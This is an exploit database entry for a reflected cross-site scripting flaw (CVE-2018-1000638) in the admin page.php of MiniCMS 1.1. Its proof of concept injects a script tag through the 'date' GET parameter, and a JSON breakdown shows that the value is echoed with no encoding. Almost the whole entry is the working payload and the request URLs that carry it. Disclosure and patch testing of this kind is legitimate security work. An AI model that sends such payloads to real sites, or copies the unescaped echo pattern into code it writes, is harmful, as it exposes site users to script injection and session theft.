MiniCMS 1.1 - Cross Site Scripting (XSS)

EDB-ID:

52175




Platform:

PHP

Date:

2025-04-11


# Exploit Title: [MiniCMS 1.1 Cross-Site Scripting (XSS) in date Parameter of mc-admin/page.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/bg5sbk/MiniCMS]
# Software Link: [https://github.com/bg5sbk/MiniCMS]
# Version: [1.10] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2018-1000638]

PoC: 
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>

Details:
{ "Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" }

[Replace Your Domain Name]